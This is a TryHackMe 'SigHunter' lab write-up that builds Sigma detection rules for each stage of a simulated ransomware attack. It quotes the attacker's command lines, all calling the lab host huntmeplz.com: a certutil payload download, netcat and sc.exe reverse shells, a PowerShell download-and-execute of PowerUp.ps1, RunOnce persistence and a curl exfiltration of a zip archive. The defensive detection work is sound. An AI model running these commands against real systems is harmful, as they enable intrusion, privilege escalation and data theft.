TryHackMe SigHunter WriteUp

Initial Information

  1. 1st week of work, ransomware incident concluded
    1. Threat mitigated successfully by Incident Responders

Attack Chain

  1. Execution of malicious HTML Application (HTA) payload from a phishing link.
  2. Execution of Certutil tool to download Netcat binary.
  3. Netcat execution to establish a reverse shell.
  4. Enumeration of privilege escalation vectors through PowerUp.ps1
  5. Abused service modification privileges to achieve System privileges.
  6. Collected sensitive data by archiving via 7-zip.
  7. Exfiltrated sensitive data through cURL binary.
  8. Executed ransomware with huntme as the file extension.
Attack Technique Indicators of Compromise
HTA payload Parent Image: chrome.exe

Image: mshta.exe

Command Line: C:\Windows\SysWOW64\mshta.exe C:\Users\victim\Downloads\update.hta
Certutil Download Image: certutil.exe

Command Line: certutil -urlcache -split -f http://huntmeplz.com/ransom.exe ransom.exe
Netcat Reverse Shell Image: nc.exe

Command Line: C:\Users\victim\AppData\Local\Temp\nc.exe huntmeplz.com 4444 -e cmd.exe

MD5 Hash: 523613A7B9DFA398CBD5EBD2DD0F4F38
PowerUp Enumeration Image: powershell.exe

Command Line: powershell "iex(new-object net.webclient).downloadstring('http://huntmeplz.com/PowerUp.ps1'); Invoke-AllChecks;"
Service Binary Modification Image: sc.exe

Command Line: sc.exe config SNMPTRAP binPath= "C:\Users\victim\AppData\Local\Temp\rev.exe huntmeplz.com 4443 -e cmd.exe"
RunOnce Persistence Image: reg.exe

Command Line: reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v MicrosoftUpdate /t REG_SZ /d "C:\Windows\System32\cmdd.exe"
7-zip Collection Image: 7z.exe

Command Line: 7z a exfil.zip * -p
cURL Exfiltration Image: curl.exe

Command Line: curl -d @exfil.zip http://huntmeplz.com:8080/
Ransomware File Encryption Image: ransom.exe

Target Filename: *.huntme
Attack Technique Required Detection Fields
HTA payload - EventID
- ParentImage
- Image
Certutil Download - EventID
- Image
- CommandLine
Netcat Reverse Shell - EventID
- Image
- CommandLine
- Hashes
PowerUp Enumeration - EventID
- Image
- CommandLine
Service Binary Modification - EventID
- Image
- CommandLine
RunOnce Persistence - EventID
- Image
- CommandLine
7-zip Collection - EventID
- Image
- CommandLine
cURL Exfiltration - EventID
- Image
- CommandLine
Ransomware File Encryption - EventID
- TargetFilename
For the following challenges we will only display the code that is relevant to our changes.

Challenge #1

We have been informed that the Image is: mshta.exe
The ParentImage is: chrome.exe
and that we also need to pull against the EventID

To do this we can easily use contains as our goto like so

detection:
  selection:
    Image|contains: 'mshta.exe' #Checks image field for the program mshta.exe
    ParentImage|contains: 'chrome.exe' #Checks the ParentImage field for chrome.exe
  condition: selection
fields: EventID #Will pull the EventID field with the rule

Challenge #2

Up next we will again focus on detection and fields. In this case we know the following:

  • Image: Certutil.exe
  • Command Line requirements
    • certutil
    • -urlcache #Forces certutil to ignore the currently existing cache and grab a new copy of the file
    • -split #Splits embedded ASN.1 elements and saves to files allowing for the capture of embedded malicious payloads
    • -f #Specifies the url and the file name to download

To write our required sigma rules we will do the following:

detection:
  selection:
    Image|contains: 'certutil.exe'
    CommandLine|contains|all: 
      - 'certutil'
      - '-urlcache'
      - '-split'
      - '-f'
  condition: selection
fields: EventID

Challenge #3

Repetitive I know, but this is what we're looking for, the NetCat reverse Shell
We know the following:

  • Image: nc.exe
  • CommandLine: C:\Users\victim\AppData\Local\Temp\nc.exe huntmeplz.com 4444 -e cmd.exe
  • Hashes: MD5 Hash: 523613A7B9DFA398CBD5EBD2DD0F4F38

We need to remember that we are checking for the -e filter on nc.exe, however, due to the file possibly having entered via a different route we want to set that apart as a separate selection.

See the code below:

detection:
  selectionNC: #checks for netcat runing a 
    EventID: 1 #Checks for event type 1
    Image|contains: '\nc.exe' #Search identifiers for the detection. Refer to the required fields provided in the task. #Checks to see if the process being run is nc.exe 
    CommandLine|contains: ' -e ' #Checks to see if netcat attempts to execute a file or application after running, if this is a true positive this will pass a command prompt to the attacker
    
  selectionHASH: #specify that we want to search for this hash as any file associated with this will be the ransomware that was originally found
    Hashes|contains: '523613A7B9DFA398CBD5EBD2DD0F4F38'
  condition: selectionNC or selectionHASH #ensures that our rule triggers on either the HASH or the nc.exe -e event

Challenge #4

PowerUp Enumeration begins running a PowerShell privilege escalation enumeration script.

We are provided the following knowledge for this:
EventID: 1
Image: powershell.exe
Command Line: powershell "iex(new-object net.webclient).downloadstring('http://huntmeplz.com/PowerUp.ps1'); Invoke-AllChecks;"

detection:
  selection:
    EventID: 1 # Ensure that Event Type is 1
    Image|endswith: powershell.exe #Search for powershell being run. 
    CommandLine|contains|all:
      - 'iex' #Checks for invoke expression, this allows running of commands and expressions on the local computer
      - 'downloadstring' #This will allow donwloading a file or script which from the previous iex will run it
      - 'Invoke-AllChecks' #This means that they will use all modules for checking
      - 'PowerUp' #A script that is used to enumerate different privilege escalations.
  condition: selection #Use the previously created selection

Challenge #5

Service Binary Modification allows for a service with too high of privileges to provide access to System Privileges

What we know:
EventID: 1
Image: sc.exe
Command Line: sc.exe config SNMPTRAP binPath= "C:\Users\victim\AppData\Local\Temp\rev.exe huntmeplz.com 4443 -e cmd.exe"

detection:
  selection:
    EventID: 1 #Ensure that Event Type is 1 
    Image|endswith: 'sc.exe' #The application running in the Service Control
    CommandLine|contains|all:
      - 'sc.exe' #The application being called is Service Control
      - ' -e ' #This is the exection command that is passed along.
      - ' config ' #Modifies the value of a service's entries
      - ' binPath= '
  condition: selection #Sets the previous services config's bin path to the malicious script

Chapter #6

RunOnce Persistence this allows an attacker to setup persistence into the system and/or network.

What we know:
EventID: 1
Image: reg.exe
Command Line: reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v MicrosoftUpdate /t REG_SZ /d "C:\Windows\System32\cmdd.exe"

detection:
  selection:
    EventID: 1 #Ensure that Event Type is 1. 
    Image|endswith: 'reg.exe' #The Registry editor is being run.
    CommandLine|contains|all:
      - " add " #This command will add a new registry key/value to the registry
      - "RunOnce" #Looks for the RunOnce which will run a program when a computer logs in.
  condition: selection #chooes the previous listed selection: option as the detection rules to look for

Challenge #7

7-Zip collection is used to begin the exfiltration process where they will be collecting data.
What we have:

  • EventID: 1
  • Image: 7z.exe
  • Command Line: 7z a exfil.zip * -p
detection:
  selection:
    EventID: 1 #Ensure that Event Type is 1. 
    Image|endswith: 7z.exe #We're looking for the 7zip process that will be used to archive and compress the data
    CommandLine|contains|all:
      - ' a ' # This flag will archive the data that is entered further in the command
      - ' * ' #This states to select all files
      - '.zip' #We can see that this is a compressed zip archive at this point
      - ' -p' #Sets a password, in this case most likely blank, on the archive
  condition: selection 

Challenge #8

cURL Exfiltration this is the extraction step that takes place after the archiving of the data. We will need to look for the push of the file up to a website

What we have for information:
EventID: 1
Image: curl.exe
CommandLine: curl -d @exfil.zip http://huntmeplz.com:8080/

detection:
  selection:
    EventID: 1 #Ensure that Event Type is 1.
    Image|endswith: curl.exe #checks for the cURL command line application
    CommandLine|contains|all:
      - 'curl ' #reviews the command line for the curl command
      - ' -d ' # checks the curl for the -d flag which will send data in a post format, can be used to move exfiltrated to a specific website
      - ' @' # FOllowing the -d flag this will specify the filename that is going to be sent to the website
      - '.zip ' # After reviewing all the other portions if they are all seen then we will see if the file is an archive.
  condition: selection #Action to be taken. Can use condition operators such as OR, AND, NOT, 

Challenge #9

Ransomware file encryption step will encrypt all files on the system and rename them to have the extension .huntme

What we know:
EventID: 11
TargetFilename: *.huntme

detection:
  selection:
    EventID: 11 #Checks if the event type is 11 
    TargetFilename|endswith: '.huntme' #Looks for files that have ben renamed by the program to end with the extension .huntme
  condition: selection